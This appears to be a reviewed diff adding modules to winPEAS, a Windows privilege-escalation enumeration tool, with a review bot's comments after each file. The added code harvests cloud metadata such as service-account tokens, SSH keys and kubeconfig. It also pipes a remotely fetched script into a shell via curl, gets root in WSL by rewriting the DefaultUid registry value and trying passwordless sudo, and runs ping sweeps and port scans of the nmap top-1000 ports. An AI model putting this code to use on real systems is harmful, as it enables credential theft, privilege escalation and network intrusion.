+ var serviceAccounts = CreateMetadataAPIRequest(url, "GET", new WebHeaderCollection { { "X-Google-Metadata-Request", "True" } });
+
+ // TODO
+ // echo " Name: $sa" - ignored for now
+
+ foreach (var serviceAccount in serviceAccounts.Trim().Split('\n'))
+ {
+ metadataEndpoints.Add(new Tuple("Email", $"{serviceAccountsEndpointUrlBase}/{serviceAccount}email", false));
+ metadataEndpoints.Add(new Tuple("Aliases", $"{serviceAccountsEndpointUrlBase}/{serviceAccount}aliases", false));
+ metadataEndpoints.Add(new Tuple("Identity", $"{serviceAccountsEndpointUrlBase}/{serviceAccount}identity", false));
+ metadataEndpoints.Add(new Tuple("Scopes", $"{serviceAccountsEndpointUrlBase}/{serviceAccount}scopes", false));
+ metadataEndpoints.Add(new Tuple("Token", $"{serviceAccountsEndpointUrlBase}/{serviceAccount}token", false));
+ }
+
+ var result = GetMetadataInfo(metadataEndpoints);
+
+ return result;
+ }
+
+ private List GetUserMetadataInfo()
+ {
+ var metadataEndpoints = new List>()
+ {
+ new Tuple("startup-script", "instance/attributes/startup-script", false),
+ };
+
+ var result = GetMetadataInfo(metadataEndpoints);
+
+ return result;
+ }
+
+ private List GetInterfacesMetadataInfo()
+ {
+ var metadataEndpoints = new List>();
+
+ var networkEndpointUrlBase = "instance/network-interfaces";
+ var url = $"{METADATA_URL_BASE}/{networkEndpointUrlBase}";
+ var ifaces = CreateMetadataAPIRequest(url, "GET", new WebHeaderCollection { { "X-Google-Metadata-Request", "True" } });
+
+ foreach (var iface in ifaces.Trim().Split('\n'))
+ {
+ metadataEndpoints.Add(new Tuple("IP", $"{networkEndpointUrlBase}/{iface}ip", false));
+ metadataEndpoints.Add(new Tuple("Subnetmask", $"{networkEndpointUrlBase}/{iface}subnetmask", false));
+ metadataEndpoints.Add(new Tuple("Gateway", $"{networkEndpointUrlBase}/{iface}gateway", false));
+ metadataEndpoints.Add(new Tuple("DNS", $"{networkEndpointUrlBase}/{iface}dns-servers", false));
+ metadataEndpoints.Add(new Tuple("Network", $"{networkEndpointUrlBase}/{iface}network", false));
+ }
+
+ var result = GetMetadataInfo(metadataEndpoints);
+
+ return result;
+ }
+
+ private List GetInstanceMetadataInfo()
+ {
+ var metadataEndpoints = new List>()
+ {
+ new Tuple("Instance Description", "instance/description", false),
+ new Tuple("Hostname", "instance/hostname", false),
+ new Tuple("Instance ID", "instance/id", false),
+ new Tuple("Instance Image", "instance/image", false),
+ new Tuple("Machine Type", "instance/machine-type", false),
+ new Tuple("Instance Name", "instance/name", false),
+ new Tuple("Instance tags", "instance/scheduling/tags", false),
+ new Tuple("Zone", "instance/zone", false),
+ new Tuple("K8s Cluster Location", "instance/attributes/cluster-location", false),
+ new Tuple("K8s Cluster name", "instance/attributes/cluster-name", false),
+ new Tuple("K8s OSLoging enabled", "instance/attributes/enable-oslogin", false),
+ new Tuple("K8s Kube-labels", "instance/attributes/kube-labels", false),
+ new Tuple("K8s Kubeconfig", "instance/attributes/kubeconfig", false),
+ new Tuple("K8s Kube-env", "instance/attributes/kube-env", false),
+ };
+
+ var result = GetMetadataInfo(metadataEndpoints);
+
+ return result;
+
+ }
+ private List GetOSLoginMetadataInfo()
+ {
+ var metadataEndpoints = new List>()
+ {
+ new Tuple("OSLogin users", "oslogin/users", false),
+ new Tuple("OSLogin Groups", "oslogin/groups", false),
+ new Tuple("OSLogin Security Keys", "oslogin/security-keys", false),
+ new Tuple("OSLogin Authorize", "oslogin/authorize", false),
+ };
+
+ var result = GetMetadataInfo(metadataEndpoints);
+
+ return result;
+ }
+
+ private List GetGCProjectMetadataInfo()
+ {
+ var metadataEndpoints = new List>()
+ {
+ new Tuple("Project-ID", "project/project-id", false),
+ new Tuple("Project Number", "project/numeric-project-id", false),
+ new Tuple("Project SSH-Keys", "project/attributes/ssh-keys", false),
+ new Tuple("All Project Attributes", "project/attributes/?recursive=true", false),
+ };
+
+ var result = GetMetadataInfo(metadataEndpoints);
+
+ return result;
+ }
+
+ private List GetMetadataInfo(List> endpointData)
+ {
+ List _endpointDataList = new List();
+
+ foreach (var tuple in endpointData)
+ {
+ string url = $"{METADATA_URL_BASE}/{tuple.Item2}";
+ var result = CreateMetadataAPIRequest(url, "GET", new WebHeaderCollection { { "X-Google-Metadata-Request", "True" } });
+
+ _endpointDataList.Add(new EndpointData()
+ {
+ EndpointName = tuple.Item1,
+ Data = result?.Trim(),
+ IsAttackVector = tuple.Item3
+ });
+ }
+
+ return _endpointDataList;
+ }
+
+ public override bool TestConnection()
+ {
+ return CreateMetadataAPIRequest(GCP_BASE_URL, "GET") != null;
+ }
+ }
+}
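Review bot: `GCP_BASE_URL` is the literal `"http://{URL_BASE}/"` — the placeholder was never substituted — so `TestConnection` hands `WebRequest.CreateHttp` a host named `{URL_BASE}`, which presumably fails URI parsing; the base class's generic `catch` turns that into `string.Empty`, `!= null` is then true, and `IsAvailable` reports a reachable metadata service on every machine that has the GCE folder, after which every endpoint request is attempted anyway. Use the real endpoint, `const string GCP_BASE_URL = "http://metadata.google.internal/";`, or probe `METADATA_URL_BASE` directly. As in `AWSInfo`, `serviceAccounts.Trim().Split('\n')` and `ifaces.Trim().Split('\n')` dereference a null when the listing request fails at the socket level, and the `{serviceAccount}email` concatenation relies on each listed entry ending in `/`, which should be stated in a comment or enforced with `serviceAccount.TrimEnd('/') + "/"`.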
diff --git a/winPEAS/winPEASexe/winPEAS/Info/FilesInfo/WSL/WSLHelper.cs b/winPEAS/winPEASexe/winPEAS/Info/FilesInfo/WSL/WSLHelper.cs
new file mode 100644
index 0000000..7cce295
--- /dev/null
+++ b/winPEAS/winPEASexe/winPEAS/Info/FilesInfo/WSL/WSLHelper.cs
@@ -0,0 +1,136 @@
+using System;
+using System.Diagnostics;
+using System.Text;
+using winPEAS.Helpers.Registry;
+
+namespace winPEAS.Info.FilesInfo.WSL
+{
+ public class WSLHelper
+ {
+ public static void RunLinpeas(string linpeasUrl)
+ {
+ string linpeasCmd = $"curl -L {linpeasUrl} --silent | sh";
+ var cmd = CreateUnixCommand(linpeasCmd);
+
+ ExecuteCommand(cmd.Item1, cmd.Item2);
+ }
+
+ internal static Tuple CreateUnixCommand(string command, string distributionName = null)
+ {
+ string wsl = Environment.Is64BitProcess
+ ? "wsl.exe"
+ : Environment.GetEnvironmentVariable("WinDir") + "\\SysNative\\wsl.exe";
+ string distributionParam = !string.IsNullOrEmpty(distributionName)
+ ? $"--distribution {distributionName}"
+ : string.Empty;
+ string args = $"{distributionParam} -- {command}";
+
+ return new Tuple(wsl, args);
+ }
+
+ static string GetWSLUser(string distributionName)
+ {
+ string command = "whoami";
+
+ var cmd = CreateUnixCommand(command, distributionName);
+ var user = ExecuteCommandWaitForOutput(cmd.Item1, cmd.Item2)?.Trim();
+
+ return user;
+ }
+
+ internal static string TryGetRootUser(string distributionName, string distributionGuid)
+ {
+ string hive = "HKCU";
+ string path = @$"SOFTWARE\Microsoft\Windows\CurrentVersion\Lxss\{distributionGuid}";
+ string key = "DefaultUid";
+ string wslUser = GetWSLUser(distributionName);
+ string exploit = $"change registry value: '{hive}\\{path}\\{key}' to 0";
+ string root = $"root ({exploit})";
+
+ if (string.Equals(wslUser, "root"))
+ {
+ return "root";
+ }
+ var originalDefaultUserValue = RegistryHelper.GetRegValue(hive, path, key);
+
+ var isValueChanged = RegistryHelper.WriteRegValue(hive, path, key, 0.ToString());
+ if (isValueChanged)
+ {
+ wslUser = GetWSLUser(distributionName);
+
+ if (string.Equals(wslUser, "root"))
+ {
+ RegistryHelper.WriteRegValue(hive, path, key, originalDefaultUserValue);
+
+ return root;
+ }
+ }
+
+ // try sudo without password
+ exploit = "sudo with empty password";
+ var cmd = CreateUnixCommand("echo -n '' | sudo -S su root -c whoami", distributionName);
+ var output = ExecuteCommandWaitForOutput(cmd.Item1, cmd.Item2);
+
+ if (output == "root")
+ {
+ return $"root ({exploit})";
+ }
+
+ return wslUser;
+ }
+
+ private static string ExecuteCommandWaitForOutput(string cmd, string args)
+ {
+ Process p = new Process();
+ p.StartInfo.UseShellExecute = false;
+ p.StartInfo.RedirectStandardOutput = true;
+ p.StartInfo.RedirectStandardError = true;
+ p.StartInfo.FileName = cmd;
+ p.StartInfo.Arguments = args;
+ p.StartInfo.StandardOutputEncoding = Encoding.UTF8;
+ p.Start();
+
+ string output = p.StandardOutput.ReadToEnd()?.Trim();
+
+ p.WaitForExit();
+
+ return output;
+ }
+
+ private static void ExecuteCommand(
+ string command,
+ string args = null,
+ string workingFolder = null
+ )
+ {
+ var processStartInfo = new ProcessStartInfo
+ {
+ UseShellExecute = false,
+ Verb = "OPEN",
+ CreateNoWindow = true,
+ FileName = command,
+ WorkingDirectory = workingFolder,
+ Arguments = args,
+ RedirectStandardOutput = true,
+ RedirectStandardError = true,
+ StandardOutputEncoding = Encoding.UTF8
+ };
+
+ using (var process = Process.Start(processStartInfo))
+ {
+ if (process != null)
+ {
+ while (!process.StandardOutput.EndOfStream)
+ {
+ Console.WriteLine(process.StandardOutput.ReadLine());
+ }
+
+ while (!process.StandardError.EndOfStream)
+ {
+ Console.WriteLine(process.StandardError.ReadLine());
+ }
+ }
+ }
+ }
+ }
+}
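Review bot: `TryGetRootUser` switches the `DefaultUid` registry value to `0` but restores `originalDefaultUserValue` only on the branch where the second `whoami` returns `root`; if `WriteRegValue` succeeds and that check fails, or `GetWSLUser` throws, the user's WSL default account is left changed for every later `wsl.exe` launch — a persistent host modification the tool should not leave behind. Restore in a `finally` (below), and if `WriteRegValue` does not already handle it, treat a null `originalDefaultUserValue` (key absent) as "remove" rather than writing the string back. `ExecuteCommandWaitForOutput` redirects stderr but never reads it and never disposes the `Process`, so a distribution that writes more than the pipe buffer to stderr deadlocks `ReadToEnd()`; read both streams (or drop `RedirectStandardError = true`) and wrap the process in `using`. The root comparison uses `string.Equals(...)` in one place and `==` in another; pick one.
```csharp
var originalDefaultUserValue = RegistryHelper.GetRegValue(hive, path, key);
var isValueChanged = RegistryHelper.WriteRegValue(hive, path, key, 0.ToString());
if (isValueChanged)
{
    try
    {
        wslUser = GetWSLUser(distributionName);
    }
    finally
    {
        // always undo the DefaultUid change, whatever whoami returned
        RegistryHelper.WriteRegValue(hive, path, key, originalDefaultUserValue);
    }

    if (string.Equals(wslUser, "root"))
    {
        return root;
    }
}
// … unchanged: sudo probe and final return …
```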
diff --git a/winPEAS/winPEASexe/winPEAS/Info/NetworkInfo/NetworkScanner/NetPinger.cs b/winPEAS/winPEASexe/winPEAS/Info/NetworkInfo/NetworkScanner/NetPinger.cs
new file mode 100644
index 0000000..298210a
--- /dev/null
+++ b/winPEAS/winPEASexe/winPEAS/Info/NetworkInfo/NetworkScanner/NetPinger.cs
@@ -0,0 +1,56 @@
+using System;
+using System.Collections.Generic;
+using System.Linq;
+using System.Net;
+using System.Net.NetworkInformation;
+using System.Threading.Tasks;
+
+namespace winPEAS.Info.NetworkInfo.NetworkScanner
+{
+ internal class NetPinger
+ {
+ private int PingTimeout = 1000;
+
+ public List HostsAlive = new List();
+
+ private List ipRange = new List();
+
+ public void AddRange(string baseIpAddress, string netmask)
+ {
+ var addresses = NetworkUtils.GetIPAddressesByNetmask(baseIpAddress, netmask).ToList();
+ var range = NetworkUtils.GetIPRange(IPAddress.Parse(addresses[0]), IPAddress.Parse(addresses[1]));
+
+ ipRange.AddRange(range);
+ }
+
+ public void AddRange(IEnumerable ipAddressList)
+ {
+ ipRange.AddRange(ipAddressList);
+ }
+
+ public async Task RunPingSweepAsync()
+ {
+ var tasks = new List();
+
+ foreach (var ip in ipRange)
+ {
+ Ping p = new Ping();
+ var task = PingAndUpdateStatus(p, ip);
+ tasks.Add(task);
+ }
+
+ await Task.WhenAll(tasks);
+ }
+
+ private async Task PingAndUpdateStatus(Ping ping, string ip)
+ {
+ var reply = await ping.SendPingAsync(ip, PingTimeout);
+
+ if (reply.Status == IPStatus.Success)
+ {
+ HostsAlive.Add(ip);
+ await Console.Out.WriteLineAsync(ip);
+ }
+ }
+ }
+}
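Review bot: `HostsAlive.Add(ip)` in `PingAndUpdateStatus` runs on whichever thread-pool thread completes each ping, and with `Task.WhenAll` many continuations run at once, so concurrent `Add` calls on a `List` can corrupt it or drop hosts; guard the add, e.g. `lock (HostsAlive) { HostsAlive.Add(ip); }`, or make the field a `ConcurrentBag`. Each `Ping` created in `RunPingSweepAsync` is never disposed, and one task per address with no throttling means a `/16` range starts tens of thousands of simultaneous pings; bound the concurrency with a `SemaphoreSlim` and dispose the `Ping` after the await. A single malformed entry in `ipRange` presumably makes `SendPingAsync` throw, which `Task.WhenAll` surfaces and aborts the whole sweep; catch per host so one bad address does not end the scan.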
diff --git a/winPEAS/winPEASexe/winPEAS/Info/NetworkInfo/NetworkScanner/NetworkScanner.cs b/winPEAS/winPEASexe/winPEAS/Info/NetworkInfo/NetworkScanner/NetworkScanner.cs
new file mode 100644
index 0000000..d403b6e
--- /dev/null
+++ b/winPEAS/winPEASexe/winPEAS/Info/NetworkInfo/NetworkScanner/NetworkScanner.cs
@@ -0,0 +1,93 @@
+using System;
+using System.Collections.Generic;
+using System.Threading.Tasks;
+using winPEAS.Helpers;
+
+namespace winPEAS.Info.NetworkInfo.NetworkScanner
+{
+ internal class NetworkScanner
+ {
+ enum ScanMode
+ {
+ Auto,
+ IPAddressList,
+ IPAddressNetmask,
+ }
+
+ private string[] ipAddressList;
+ private bool isAuto = false;
+ private ScanMode scanMode = ScanMode.IPAddressList;
+ private string baseAddress;
+ private string netmask;
+ IEnumerable ports;
+
+ public NetworkScanner(string options, IEnumerable ports = null)
+ {
+ /*
+ --network "auto" - find interfaces/hosts automatically
+ --network "10.10.10.10,10.10.10.20" - scan only selected ip address(es)
+ --network "10.10.10.10/24" - scan host based on ip address/netmask
+ */
+ this.ports = ports;
+
+ if (string.Equals(options, "auto", StringComparison.InvariantCultureIgnoreCase))
+ {
+ scanMode = ScanMode.Auto;
+ }
+ else if (options.Contains("/"))
+ {
+ var parts = options.Split('/');
+ baseAddress = parts[0];
+ netmask = parts[1];
+ scanMode = ScanMode.IPAddressNetmask;
+ }
+ else
+ {
+ ipAddressList = options.Split(',');
+ scanMode = ScanMode.IPAddressList;
+ }
+ }
+
+ public void Scan()
+ {
+ try
+ {
+ Beaprint.GreatPrint("Scanning network (it might take some time)...");
+
+ List aliveHosts = new List();
+ NetPinger netPinger = new NetPinger();
+
+ if (scanMode == ScanMode.Auto)
+ {
+ // this is the "auto" mode
+ foreach (var ipAddressAndNetmask in NetworkUtils.GetInternalInterfaces())
+ {
+ netPinger.AddRange(ipAddressAndNetmask.Item1, ipAddressAndNetmask.Item2);
+ }
+ }
+ if (scanMode == ScanMode.IPAddressNetmask)
+ {
+ netPinger.AddRange(baseAddress, netmask);
+ }
+ else if (scanMode == ScanMode.IPAddressList)
+ {
+ netPinger.AddRange(ipAddressList);
+ }
+
+ var task = netPinger.RunPingSweepAsync();
+ task.Wait();
+ aliveHosts.AddRange(netPinger.HostsAlive);
+
+ PortScanner ps = new PortScanner(this.ports);
+ Parallel.ForEach(aliveHosts, host =>
+ {
+ ps.Start(host);
+ });
+ }
+ catch (Exception e)
+ {
+ Beaprint.PrintException(e.Message);
+ }
+ }
+ }
+}
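Review bot: `task.Wait()` in `Scan` wraps any failure from the sweep in an `AggregateException`, so the `catch (Exception e)` below prints only the generic aggregate message and the real cause is lost; unwrap with `netPinger.RunPingSweepAsync().GetAwaiter().GetResult();` or make `Scan` async and await it. The constructor does not validate `options`: a null dereferences on `.Contains`, and `"10.10.10.10/"` yields an empty netmask that `NetworkUtils` later feeds to `Convert.ToInt32` — check `parts.Length == 2` and fail with a clear message. `isAuto` is assigned but never read; remove it.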
diff --git a/winPEAS/winPEASexe/winPEAS/Info/NetworkInfo/NetworkScanner/NetworkUtils.cs b/winPEAS/winPEASexe/winPEAS/Info/NetworkInfo/NetworkScanner/NetworkUtils.cs
new file mode 100644
index 0000000..9e7757f
--- /dev/null
+++ b/winPEAS/winPEASexe/winPEAS/Info/NetworkInfo/NetworkScanner/NetworkUtils.cs
@@ -0,0 +1,221 @@
+using System;
+using System.Collections.Generic;
+using System.ComponentModel;
+using System.Linq;
+using System.Net;
+using System.Net.NetworkInformation;
+
+namespace winPEAS.Info.NetworkInfo.NetworkScanner
+{
+ internal static class NetworkUtils
+ {
+
+ ///
+ /// IPAddress to UInteger
+ ///
+ ///
+ ///
+ public static uint IPToUInt(this string ipAddress)
+ {
+ if (string.IsNullOrEmpty(ipAddress))
+ return 0;
+
+ if (IPAddress.TryParse(ipAddress, out IPAddress ip))
+ {
+ var bytes = ip.GetAddressBytes();
+ Array.Reverse(bytes);
+ return BitConverter.ToUInt32(bytes, 0);
+ }
+ else
+ return 0;
+
+ }
+
+ ///
+ /// IP in Uinteger to string
+ ///
+ ///
+ ///
+ public static string IPToString(this uint ipUInt)
+ {
+ return ToIPAddress(ipUInt).ToString();
+ }
+
+
+ ///
+ /// IP in Uinteger to IPAddress
+ ///
+ ///
+ ///
+ public static IPAddress ToIPAddress(this uint ipUInt)
+ {
+ var bytes = BitConverter.GetBytes(ipUInt);
+ Array.Reverse(bytes);
+ return new IPAddress(bytes);
+ }
+
+ ///
+ /// First and Last IPv4 from IP + Mask
+ ///
+ ///
+ /// Accepts CIDR or IP. Example 255.255.255.0 or 24
+ /// Removes not usable IPs from Range
+ ///
+ ///
+ /// If ´filterUsable=false´ first IP is not usable and last is reserved for broadcast.
+ ///
+ public static string[] GetIpRange(string ipv4, string mask, bool filterUsable)
+ {
+ uint[] uiIpRange = GetIpUintRange(ipv4, mask, filterUsable);
+
+ return Array.ConvertAll(uiIpRange, x => IPToString(x));
+ }
+
+ ///
+ /// First and Last IPv4 + Mask.
+ ///
+ ///
+ /// Accepts CIDR or IP. Example 255.255.255.0 or 24
+ /// Removes not usable IPs from Range
+ ///
+ ///
+ /// First IP is not usable and last is reserverd for broadcast.
+ /// Can use all IPs in between
+ ///
+ public static uint[] GetIpUintRange(string ipv4, string mask, bool filterUsable)
+ {
+ uint sub;
+ //check if mask is CIDR Notation
+ if (mask.Contains("."))
+ {
+ sub = IPToUInt(mask);
+ }
+ else
+ {
+ sub = ~(0xffffffff >> Convert.ToInt32(mask));
+ }
+
+ uint ip2 = IPToUInt(ipv4);
+
+
+ uint first = ip2 & sub;
+ uint last = first | (0xffffffff & ~sub);
+
+ if (filterUsable)
+ {
+ first += 1;
+ last -= 1;
+ }
+
+ return new uint[] { first, last };
+ }
+
+ public static IEnumerable GetIPRange(IPAddress startIP, IPAddress endIP)
+ {
+ uint sIP = ipToUint(startIP.GetAddressBytes());
+ uint eIP = ipToUint(endIP.GetAddressBytes());
+ while (sIP <= eIP)
+ {
+ yield return new IPAddress(reverseBytesArray(sIP)).ToString();
+ sIP++;
+ }
+ }
+
+ public static string CidrToNetmask(int cidr)
+ {
+ var nmask = 0xFFFFFFFF;
+ nmask <<= 32 - cidr;
+ byte[] bytes = BitConverter.GetBytes(nmask);
+ Array.Reverse(bytes);
+ nmask = BitConverter.ToUInt32(bytes, 0);
+ var netmask = new System.Net.IPAddress(nmask);
+ return netmask.ToString();
+ }
+
+ public static IEnumerable GetIPAddressesByNetmask(string ipAddress, string netmask)
+ {
+ // TODO
+ // e.g.
+ // netmask should be e.g. 24 - currently we only support this format
+ string[] range = NetworkUtils.GetIpRange(ipAddress, netmask, false);
+
+ return range;
+ }
+
+ public static IEnumerable GetHostsByIPAndNetmask(string ipAddressAndNetmask)
+ {
+ // TODO
+ // get hosts by ip address & netmask
+
+ // https://itecnote.com/tecnote/c-proper-way-to-scan-a-range-of-ip-addresses/
+ // we nned to (maybe in parallel)
+ // - ping e.g. 3 times
+ // - scan top 5 ports
+ var parts = ipAddressAndNetmask.Split(':');
+
+ return new List
+ {
+ parts[0]
+ };
+ }
+
+ public static List> GetInternalInterfaces()
+ {
+ List> result = new List>();
+
+ foreach (NetworkInterface ni in NetworkInterface.GetAllNetworkInterfaces())
+ {
+ if (ni.OperationalStatus == OperationalStatus.Up &&
+ (ni.NetworkInterfaceType == NetworkInterfaceType.Wireless80211 || ni.NetworkInterfaceType == NetworkInterfaceType.Ethernet))
+ {
+ // Console.WriteLine();
+ foreach (UnicastIPAddressInformation ip in ni.GetIPProperties().UnicastAddresses)
+ {
+ if (ip.Address.AddressFamily == System.Net.Sockets.AddressFamily.InterNetwork)
+ {
+ // we need ip address and a netmask as well
+ result.Add(new Tuple(ip.Address.ToString(), ip.IPv4Mask.ToString()));
+ }
+ }
+ }
+ }
+
+ return result;
+ }
+
+ /* Convert bytes array to 32 bit long value */
+ static uint ipToUint(byte[] ipBytes)
+ {
+ ByteConverter bConvert = new ByteConverter();
+ uint ipUint = 0;
+
+ int shift = 24; // indicates number of bits left for shifting
+ foreach (byte b in ipBytes)
+ {
+ if (ipUint == 0)
+ {
+ ipUint = (uint)bConvert.ConvertTo(b, typeof(uint)) << shift;
+ shift -= 8;
+ continue;
+ }
+
+ if (shift >= 8)
+ ipUint += (uint)bConvert.ConvertTo(b, typeof(uint)) << shift;
+ else
+ ipUint += (uint)bConvert.ConvertTo(b, typeof(uint));
+
+ shift -= 8;
+ }
+
+ return ipUint;
+ }
+
+ /* reverse byte order in array */
+ private static uint reverseBytesArray(uint ip)
+ {
+ byte[] bytes = BitConverter.GetBytes(ip);
+ bytes = bytes.Reverse().ToArray();
+ return (uint)BitConverter.ToInt32(bytes, 0);
+ }
+ }
+}
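Review bot: `GetIpUintRange` computes the mask with `~(0xffffffff >> Convert.ToInt32(mask))`, and C# reduces a 32-bit shift count modulo 32, so `/32` shifts by 0 and yields a mask of 0 — the "range" becomes 0.0.0.0 to 255.255.255.255 — and nothing rejects a CIDR outside 0–32 or a non-numeric string; compute it as `uint sub = cidr == 32 ? uint.MaxValue : ~(0xffffffffu >> cidr);` after an `ArgumentOutOfRangeException` check on `cidr` (`CidrToNetmask` has the same `32 - cidr` hazard). `GetIPRange` loops with `while (sIP <= eIP) { …; sIP++; }`, which never terminates when `eIP` is `uint.MaxValue` because the increment wraps to 0; yield, then `break` when `sIP == eIP` before incrementing. `GetIPAddressesByNetmask` passes `filterUsable: false`, so the network and broadcast addresses are included in the sweep; the `// TODO` there should say whether that is intended. `ipToUint` can be `(uint)IPAddress.NetworkToHostOrder(BitConverter.ToInt32(ipBytes, 0))` instead of the `ByteConverter` loop, and the same expression replaces `reverseBytesArray`.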
diff --git a/winPEAS/winPEASexe/winPEAS/Info/NetworkInfo/NetworkScanner/PortScanner.cs b/winPEAS/winPEASexe/winPEAS/Info/NetworkInfo/NetworkScanner/PortScanner.cs
new file mode 100644
index 0000000..ca8b229
--- /dev/null
+++ b/winPEAS/winPEASexe/winPEAS/Info/NetworkInfo/NetworkScanner/PortScanner.cs
@@ -0,0 +1,122 @@
+using System;
+using System.Collections.Generic;
+using System.Net.Sockets;
+using System.Threading;
+using System.Threading.Tasks;
+
+namespace winPEAS.Info.NetworkInfo.NetworkScanner
+{
+ class PortScanner
+ {
+ private int TcpTimeout = 500; // ms
+
+ #region nmap tcp top 1000
+
+ static List nmapTop1000TCPPorts = new List
+ {
+ 1,3,4,6,7,9,13,17,19,20,21,22,23,24,25,26,30,32,33,37,42,43,49,53,70,79,80,81,82,83,84,85,88,89,90,99,100,106,109,110,111,113,119,125,135,139,143,144,146,161,163,
+ 179,199,211,212,222,254,255,256,259,264,280,301,306,311,340,366,389,406,407,416,417,425,427,443,444,445,458,464,465,481,497,500,512,513,514,515,524,541,543,544,545,
+ 548,554,555,563,587,593,616,617,625,631,636,646,648,666,667,668,683,687,691,700,705,711,714,720,722,726,749,765,777,783,787,800,801,808,843,873,880,888,898,900,901,
+ 902,903,911,912,981,987,990,992,993,995,999,1000,1001,1002,1007,1009,1010,1011,1021,1022,1023,1024,1025,1026,1027,1028,1029,1030,1031,1032,1033,1034,1035,1036,1037,
+ 1038,1039,1040,1041,1042,1043,1044,1045,1046,1047,1048,1049,1050,1051,1052,1053,1054,1055,1056,1057,1058,1059,1060,1061,1062,1063,1064,1065,1066,1067,1068,1069,1070,
+ 1071,1072,1073,1074,1075,1076,1077,1078,1079,1080,1081,1082,1083,1084,1085,1086,1087,1088,1089,1090,1091,1092,1093,1094,1095,1096,1097,1098,1099,1100,1102,1104,1105,
+ 1106,1107,1108,1110,1111,1112,1113,1114,1117,1119,1121,1122,1123,1124,1126,1130,1131,1132,1137,1138,1141,1145,1147,1148,1149,1151,1152,1154,1163,1164,1165,1166,1169,
+ 1174,1175,1183,1185,1186,1187,1192,1198,1199,1201,1213,1216,1217,1218,1233,1234,1236,1244,1247,1248,1259,1271,1272,1277,1287,1296,1300,1301,1309,1310,1311,1322,1328,
+ 1334,1352,1417,1433,1434,1443,1455,1461,1494,1500,1501,1503,1521,1524,1533,1556,1580,1583,1594,1600,1641,1658,1666,1687,1688,1700,1717,1718,1719,1720,1721,1723,1755,
+ 1761,1782,1783,1801,1805,1812,1839,1840,1862,1863,1864,1875,1900,1914,1935,1947,1971,1972,1974,1984,1998,1999,2000,2001,2002,2003,2004,2005,2006,2007,2008,2009,2010,
+ 2013,2020,2021,2022,2030,2033,2034,2035,2038,2040,2041,2042,2043,2045,2046,2047,2048,2049,2065,2068,2099,2100,2103,2105,2106,2107,2111,2119,2121,2126,2135,2144,2160,
+ 2161,2170,2179,2190,2191,2196,2200,2222,2251,2260,2288,2301,2323,2366,2381,2382,2383,2393,2394,2399,2401,2492,2500,2522,2525,2557,2601,2602,2604,2605,2607,2608,2638,
+ 2701,2702,2710,2717,2718,2725,2800,2809,2811,2869,2875,2909,2910,2920,2967,2968,2998,3000,3001,3003,3005,3006,3007,3011,3013,3017,3030,3031,3052,3071,3077,3128,3168,
+ 3211,3221,3260,3261,3268,3269,3283,3300,3301,3306,3322,3323,3324,3325,3333,3351,3367,3369,3370,3371,3372,3389,3390,3404,3476,3493,3517,3527,3546,3551,3580,3659,3689,
+ 3690,3703,3737,3766,3784,3800,3801,3809,3814,3826,3827,3828,3851,3869,3871,3878,3880,3889,3905,3914,3918,3920,3945,3971,3986,3995,3998,4000,4001,4002,4003,4004,4005,
+ 4006,4045,4111,4125,4126,4129,4224,4242,4279,4321,4343,4443,4444,4445,4446,4449,4550,4567,4662,4848,4899,4900,4998,5000,5001,5002,5003,5004,5009,5030,5033,5050,5051,
+ 5054,5060,5061,5080,5087,5100,5101,5102,5120,5190,5200,5214,5221,5222,5225,5226,5269,5280,5298,5357,5405,5414,5431,5432,5440,5500,5510,5544,5550,5555,5560,5566,5631,
+ 5633,5666,5678,5679,5718,5730,5800,5801,5802,5810,5811,5815,5822,5825,5850,5859,5862,5877,5900,5901,5902,5903,5904,5906,5907,5910,5911,5915,5922,5925,5950,5952,5959,
+ 5960,5961,5962,5963,5987,5988,5989,5998,5999,6000,6001,6002,6003,6004,6005,6006,6007,6009,6025,6059,6100,6101,6106,6112,6123,6129,6156,6346,6389,6502,6510,6543,6547,
+ 6565,6566,6567,6580,6646,6666,6667,6668,6669,6689,6692,6699,6779,6788,6789,6792,6839,6881,6901,6969,7000,7001,7002,7004,7007,7019,7025,7070,7100,7103,7106,7200,7201,
+ 7402,7435,7443,7496,7512,7625,7627,7676,7741,7777,7778,7800,7911,7920,7921,7937,7938,7999,8000,8001,8002,8007,8008,8009,8010,8011,8021,8022,8031,8042,8045,8080,8081,
+ 8082,8083,8084,8085,8086,8087,8088,8089,8090,8093,8099,8100,8180,8181,8192,8193,8194,8200,8222,8254,8290,8291,8292,8300,8333,8383,8400,8402,8443,8500,8600,8649,8651,
+ 8652,8654,8701,8800,8873,8888,8899,8994,9000,9001,9002,9003,9009,9010,9011,9040,9050,9071,9080,9081,9090,9091,9099,9100,9101,9102,9103,9110,9111,9200,9207,9220,9290,
+ 9415,9418,9485,9500,9502,9503,9535,9575,9593,9594,9595,9618,9666,9876,9877,9878,9898,9900,9917,9929,9943,9944,9968,9998,9999,10000,10001,10002,10003,10004,10009,10010,
+ 10012,10024,10025,10082,10180,10215,10243,10566,10616,10617,10621,10626,10628,10629,10778,11110,11111,11967,12000,12174,12265,12345,13456,13722,13782,13783,14000,14238,
+ 14441,14442,15000,15002,15003,15004,15660,15742,16000,16001,16012,16016,16018,16080,16113,16992,16993,17877,17988,18040,18101,18988,19101,19283,19315,19350,19780,19801,
+ 19842,20000,20005,20031,20221,20222,20828,21571,22939,23502,24444,24800,25734,25735,26214,27000,27352,27353,27355,27356,27715,28201,30000,30718,30951,31038,31337,32768,
+ 32769,32770,32771,32772,32773,32774,32775,32776,32777,32778,32779,32780,32781,32782,32783,32784,32785,33354,33899,34571,34572,34573,35500,38292,40193,40911,41511,42510,
+ 44176,44442,44443,44501,45100,48080,49152,49153,49154,49155,49156,49157,49158,49159,49160,49161,49163,49165,49167,49175,49176,49400,49999,50000,50001,50002,50003,50006,
+ 50300,50389,50500,50636,50800,51103,51493,52673,52822,52848,52869,54045,54328,55055,55056,55555,55600,56737,56738,57294,57797,58080,60020,60443,61532,61900,62078,63331,
+ 64623,64680,65000,65129,65389
+ };
+
+ #endregion
+
+ private struct TcpPortState
+ {
+ public TcpClient MainClient { get; set; }
+ public bool IsTcpPortOpen { get; set; }
+ }
+
+ IEnumerable portsToScan = nmapTop1000TCPPorts;
+
+ public PortScanner(IEnumerable ports)
+ {
+ if (ports != null)
+ {
+ portsToScan = ports;
+ }
+ }
+
+ public void Start(string host)
+ {
+ Parallel.ForEach(portsToScan, port =>
+ {
+ RunScanTcp(host, port);
+ });
+ }
+
+ public void RunScanTcp(string host, int port)
+ {
+ Thread.Sleep(1);
+
+ var newClient = new TcpClient();
+
+ var state = new TcpPortState
+ {
+ MainClient = newClient,
+ IsTcpPortOpen = true
+ };
+
+ IAsyncResult ar = newClient.BeginConnect(host, port, AsyncCallback, state);
